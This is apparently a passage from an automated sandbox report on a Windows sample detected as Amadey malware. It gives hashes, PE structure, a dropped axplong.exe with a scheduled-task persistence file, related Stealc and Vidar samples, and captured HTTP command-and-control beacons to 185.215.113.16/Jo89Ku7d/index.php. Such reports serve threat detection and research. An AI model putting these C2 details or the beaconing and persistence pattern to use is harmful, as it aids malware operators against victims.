                                      • 185.215.113.16/Jo89Ku7d/index.php
                                      file.exeGet hashmaliciousAmadeyBrowse
                                      • 185.215.113.16/Jo89Ku7d/index.php
                                      file.exeGet hashmaliciousAmadeyBrowse
                                      • 185.215.113.16/Jo89Ku7d/index.php

                                      Domains

                                      No context

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.37
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.37
                                      file.exeGet hashmaliciousAmadeyBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousAmadeyBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.37
                                      8y4qT1eVpi.exeGet hashmaliciousAmadey, StealcBrowse
                                      • 185.215.113.103
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.37
                                      file.exeGet hashmaliciousAmadeyBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.37
                                      file.exeGet hashmaliciousAmadeyBrowse
                                      • 185.215.113.16

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\file.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1942016
                                      Entropy (8bit):7.9506187583481704
                                      Encrypted:false
                                      SSDEEP:49152:ArxiFKgvQhg6nnn9b8Tpwoj03t9E9ru/+1j:VIOig6nn58TZ03z8Sm
                                      MD5:E3AA1042729BC6D0DDBED39DDB48B872
                                      SHA1:D9642336D578F012359BBD1F49C90798A76D92AC
                                      SHA-256:14165C7B3DA199B6B30C325C1906D87578CEEBE57CDA17A1BD87AAE2C1AAF06E
                                      SHA-512:9213373356CD9A9E6BB30F1F434619C1DC16A3EB0BC653860E4E41249C9963145F44EA3D2327C7EE6EE5B7DCCF8126957699845357E7BB689F8F532EC263F33E
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 53%
                                      Reputation:low
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................M...........@..........................@M.....kF....@.................................W...k.............................L...............................L..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...wpzcbdbk.....p2.....................@...remsbmyf......M......z..............@....taggant.0....M.."..................@...........................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

                                      Download File
                                      Process:C:\Users\user\Desktop\file.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Reputation:high, very likely benign file
                                      Preview:[ZoneTransfer]....ZoneId=0

                                      C:\Windows\Tasks\axplong.job

                                      Download File
                                      Process:C:\Users\user\Desktop\file.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):280
                                      Entropy (8bit):3.408034611741788
                                      Encrypted:false
                                      SSDEEP:6:vRqKSt5XflNyMsUEZ+lX1lOJUPelkDdtFYSoQI/uy0lb2Et0:UKSvfqMsQ1lOmeeDQQI/uVqEt0
                                      MD5:441DFAF890D059FAEEDBFD246877AA7D
                                      SHA1:6E86D3C059788940AA93E0CF8DBDC0D99334F59E
                                      SHA-256:DB4C6519ABBA13F7B5D8FDF1F73EF2649C76E759D139CB658E5F5D0E859CB1A3
                                      SHA-512:7E741F5A4EF45B97043EFFD4FB3996A2C7DA486B8C21E78FBBFB4D0CF7B64D1B853D392CC6C3F808FECEF9D157703B489CEABD408DD60B4701D84482480303FB
                                      Malicious:false
                                      Reputation:low
                                      Preview:....1S..N.C.7...d.F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........T.I.N.A.-.P.C.\.t.i.n.a...................0.................7.@3P.........................

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.9506187583481704
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:file.exe
                                      File size:1'942'016 bytes
                                      MD5:e3aa1042729bc6d0ddbed39ddb48b872
                                      SHA1:d9642336d578f012359bbd1f49c90798a76d92ac
                                      SHA256:14165c7b3da199b6b30c325c1906d87578ceebe57cda17a1bd87aae2c1aaf06e
                                      SHA512:9213373356cd9a9e6bb30f1f434619c1dc16a3eb0bc653860e4e41249c9963145f44ea3d2327c7ee6ee5b7dccf8126957699845357e7bb689f8f532ec263f33e
                                      SSDEEP:49152:ArxiFKgvQhg6nnn9b8Tpwoj03t9E9ru/+1j:VIOig6nn58TZ03z8Sm
                                      TLSH:9A9533EFBC2B68EFC86F53379F55D12C75284A5CAA9A09DB6B04636200276D17630FD0
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

                                      File Icon

                                      Icon Hash:00928e8e8686b000

                                      Static PE Info

                                      General

                                      Entrypoint:0x8d1000
                                      Entrypoint Section:.taggant
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:6
                                      OS Version Minor:0
                                      File Version Major:6
                                      File Version Minor:0
                                      Subsystem Version Major:6
                                      Subsystem Version Minor:0
                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                      Entrypoint Preview

                                      Instruction
                                      jmp 00007F84B06D9DBAh
                                      jo 00007F84B06D9DD3h
                                      add byte ptr [eax], al
                                      jmp 00007F84B06DBDB5h
                                      add byte ptr [edi], al
                                      or al, byte ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], dl
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [edx+ecx], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add dword ptr [eax+00000000h], eax
                                      add byte ptr [eax], al
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add al, 0Ah
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      inc eax
                                      or al, byte ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], cl
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      pop es
                                      or al, byte ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], dl
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [edi], al
                                      or al, byte ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [ecx], al
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      pop es
                                      or al, byte ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], dh
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add al, 00h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [ecx], al
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x4cf4140x10wpzcbdbk
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x4cf3c40x18wpzcbdbk
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      0x10000x680000x2de002b7b72fd401673c787b6d8cf7bbc8dc1False0.9972060200953679data7.979919668265035IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x690000x1e00x200375348566cb70a830eaa7067e63c58cdFalse0.58203125data4.495148590062898IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      0x6b0000x2bc0000x20074ae95edef2eb00e11e5bcdb912774daunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      wpzcbdbk0x3270000x1a90000x1a8600a14b57d42f66a7b77f448f190bb8b237False0.9945939571060383data7.953456823391056IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      remsbmyf0x4d00000x10000x600d8935feeaa93faf32d1c01e3b500b42dFalse0.57421875zlib compressed data4.901257383568305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .taggant0x4d10000x30000x22004bc813bb3f250935e4bebbaa88c2266fFalse0.054457720588235295DOS executable (COM)0.6440756663242801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_MANIFEST0x4cf4240x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                      Imports

                                      DLLImport
                                      kernel32.dlllstrcpy

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-09-27T12:55:12.578966+02002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.949711185.215.113.1680TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Sep 27, 2024 12:55:03.309124947 CEST4970980192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:04.317728043 CEST4970980192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:06.317720890 CEST4970980192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:07.319165945 CEST4971080192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:08.317749977 CEST4971080192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:10.333381891 CEST4971080192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:11.428338051 CEST4971180192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:11.459837914 CEST8049711185.215.113.16192.168.2.9
                                      Sep 27, 2024 12:55:11.460067987 CEST4971180192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:11.460354090 CEST4971180192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:11.708509922 CEST4971180192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:11.758088112 CEST8049711185.215.113.16192.168.2.9
                                      Sep 27, 2024 12:55:12.578684092 CEST8049711185.215.113.16192.168.2.9
                                      Sep 27, 2024 12:55:12.578965902 CEST4971180192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:12.582197905 CEST4971180192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:12.833391905 CEST4971180192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:13.146023035 CEST4971180192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:13.367391109 CEST8049711185.215.113.16192.168.2.9
                                      Sep 27, 2024 12:55:13.367697001 CEST4971180192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:13.755270958 CEST4971180192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:14.263987064 CEST8049711185.215.113.16192.168.2.9
                                      Sep 27, 2024 12:55:14.265084028 CEST4971180192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:14.958365917 CEST4971180192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:16.055530071 CEST8049711185.215.113.16192.168.2.9
                                      Sep 27, 2024 12:55:16.055679083 CEST4971180192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:16.161581039 CEST4971180192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:16.583633900 CEST4971180192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:16.623991013 CEST8049711185.215.113.16192.168.2.9
                                      Sep 27, 2024 12:55:16.625435114 CEST4971180192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:16.695854902 CEST4971280192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:17.708440065 CEST4971280192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:19.707447052 CEST8049711185.215.113.16192.168.2.9
                                      Sep 27, 2024 12:55:19.707725048 CEST4971180192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:19.708391905 CEST4971280192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:20.711522102 CEST4971380192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:21.724173069 CEST4971380192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:21.792213917 CEST8049713185.215.113.16192.168.2.9
                                      Sep 27, 2024 12:55:21.792331934 CEST4971380192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:21.792572021 CEST4971380192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:22.807519913 CEST8049713185.215.113.16192.168.2.9
                                      Sep 27, 2024 12:55:22.807641029 CEST4971380192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:24.828252077 CEST8049713185.215.113.16192.168.2.9
                                      Sep 27, 2024 12:55:24.828352928 CEST4971380192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:25.787935972 CEST4971380192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:25.897188902 CEST4971480192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:26.871474028 CEST8049711185.215.113.16192.168.2.9
                                      Sep 27, 2024 12:55:26.871573925 CEST4971180192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:26.911878109 CEST4971480192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:28.925228119 CEST8049713185.215.113.16192.168.2.9
                                      Sep 27, 2024 12:55:28.925287962 CEST4971380192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:28.927119017 CEST4971480192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:29.914701939 CEST4971580192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:30.927159071 CEST4971580192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:32.927211046 CEST4971580192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:32.993077040 CEST8049715185.215.113.16192.168.2.9
                                      Sep 27, 2024 12:55:32.993181944 CEST4971580192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:32.993370056 CEST4971580192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:34.010745049 CEST8049715185.215.113.16192.168.2.9
                                      Sep 27, 2024 12:55:34.010826111 CEST4971580192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:36.290978909 CEST8049715185.215.113.16192.168.2.9
                                      Sep 27, 2024 12:55:36.291112900 CEST4971580192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:37.005579948 CEST4971580192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:37.111582994 CEST8049713185.215.113.16192.168.2.9
                                      Sep 27, 2024 12:55:37.111753941 CEST4971380192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:37.115575075 CEST4971680192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:38.114660978 CEST4971680192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:40.114897966 CEST4971680192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:40.187973022 CEST8049715185.215.113.16192.168.2.9
                                      Sep 27, 2024 12:55:40.188028097 CEST4971580192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:41.131608963 CEST4971780192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:42.146061897 CEST4971780192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:44.145997047 CEST4971780192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:45.261044979 CEST4971880192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:46.270983934 CEST4971880192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:48.271095037 CEST4971880192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:48.382384062 CEST8049715185.215.113.16192.168.2.9
                                      Sep 27, 2024 12:55:48.382518053 CEST4971580192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:49.339041948 CEST4971980192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:50.350778103 CEST4971980192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:52.349150896 CEST4971980192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:53.461714029 CEST4972080192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:54.474124908 CEST4972080192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:56.474107027 CEST4972080192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:57.490608931 CEST4972180192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:58.489772081 CEST4972180192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:58.524954081 CEST8049721185.215.113.16192.168.2.9
                                      Sep 27, 2024 12:55:58.525103092 CEST4972180192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:58.525943995 CEST4972180192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:55:59.549938917 CEST8049721185.215.113.16192.168.2.9
                                      Sep 27, 2024 12:55:59.550188065 CEST4972180192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:56:01.646148920 CEST4972180192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:56:02.536946058 CEST4972180192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:56:02.578629971 CEST8049721185.215.113.16192.168.2.9
                                      Sep 27, 2024 12:56:02.578725100 CEST4972180192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:56:02.649398088 CEST4972280192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:56:02.681993961 CEST8049722185.215.113.16192.168.2.9
                                      Sep 27, 2024 12:56:02.682061911 CEST4972280192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:56:02.682647943 CEST4972280192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:56:02.942955017 CEST4972280192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:56:03.255420923 CEST4972280192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:56:03.707632065 CEST8049722185.215.113.16192.168.2.9
                                      Sep 27, 2024 12:56:03.707700014 CEST4972280192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:56:03.864888906 CEST4972280192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:56:05.067892075 CEST4972280192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:56:05.809165001 CEST8049722185.215.113.16192.168.2.9
                                      Sep 27, 2024 12:56:05.809268951 CEST4972280192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:56:06.290822983 CEST4972280192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:56:06.693115950 CEST4972280192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:56:06.696418047 CEST4972380192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:56:07.849149942 CEST4972380192.168.2.9185.215.113.16
                                      Sep 27, 2024 12:56:09.849378109 CEST4972380192.168.2.9185.215.113.16

                                      HTTP Request Dependency Graph

                                      • 185.215.113.16

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.949711185.215.113.16808080C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 27, 2024 12:55:11.460354090 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s
                                      Sep 27, 2024 12:55:11.708509922 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s
                                      Sep 27, 2024 12:55:12.578684092 CEST219INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Fri, 27 Sep 2024 10:55:12 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Refresh: 0; url = Login.php
                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 1 0
                                      Sep 27, 2024 12:55:12.582197905 CEST306OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 152
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31
                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
                                      Sep 27, 2024 12:55:12.833391905 CEST306OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 152
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31
                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
                                      Sep 27, 2024 12:55:13.146023035 CEST306OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 152
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31
                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
                                      Sep 27, 2024 12:55:13.367391109 CEST219INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Fri, 27 Sep 2024 10:55:12 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Refresh: 0; url = Login.php
                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 1 0
                                      Sep 27, 2024 12:55:13.755270958 CEST306OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 152
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31
